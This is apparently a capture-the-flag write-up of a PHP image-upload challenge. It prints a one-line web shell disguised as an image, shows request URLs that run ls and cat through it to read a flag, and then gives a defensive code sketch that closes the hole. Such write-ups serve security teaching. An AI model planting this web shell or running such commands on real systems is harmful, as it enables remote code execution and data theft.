There is only one form that accepts a file.
The file validation is based on the extension, so we can try to upload a `shell.php.jpg` "image" with content like this:

```php
<?=`$_GET[0]`?>
```
When the image is uploaded, we see a page like this:
Click on See image and we see a blank page with some strange PHP errors. That's because our "image" expects a GET parameter called "0", so let's add one:
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls`
and we can see the list of directories in the project root.
Now it's time to search for the flag. Let's check the home directory like this:
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home`
We see there is only one folder, `hermit`.
Let's check that folder:
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit` - and there is a `flag` folder now.
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit/flag` - shows us `userflag.txt`
`104.197.195.221:8086/show.php?filename=VbvJC0&0=cat /home/hermit/flag/userflag.txt` - shows us the flag
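The two weaknesses this walkthrough relies on are the extension-only check at upload and a `show.php` that runs the stored file as PHP. The sketch below is an added example of how a defender would close both; it is not the challenge's source code. The form field name `image`, the `UPLOAD_DIR` path, the 16-hex-character id format and the function names are assumptions, and it assumes `show.php` currently pulls the file in with `include` or similar, which the PHP errors suggest but the page does not show.

```php
<?php
// Added example, not the challenge's code. Assumed: uploads live in UPLOAD_DIR,
// which is outside the web root and is never executed by the web server.
const UPLOAD_DIR = '/var/app-uploads';
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Upload side: decide the type from the file's bytes, never from the client's filename.
function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // Server-chosen name and extension: "shell.php.jpg" never reaches the disk.
    $id = bin2hex(random_bytes(8));
    $dest = UPLOAD_DIR . '/' . $id . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $id;
}

// Display side: content checks can be passed by a file that is both a valid
// image and contains PHP, so the file must only ever be streamed as bytes.
// readfile() does that; include/require would execute any embedded PHP.
function show_image(string $id): void
{
    if (!preg_match('/^[0-9a-f]{16}$/', $id)) {   // fixed id format, no path characters
        http_response_code(400);
        return;
    }
    $matches = glob(UPLOAD_DIR . '/' . $id . '.*');
    if (!$matches) {                              // empty array or false
        http_response_code(404);
        return;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($matches[0]);
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    readfile($matches[0]);
}
```

With this in place, the one-line payload above is rejected at upload because its bytes are not an image, and even a file that passes the content checks is sent to the browser as image data instead of being interpreted.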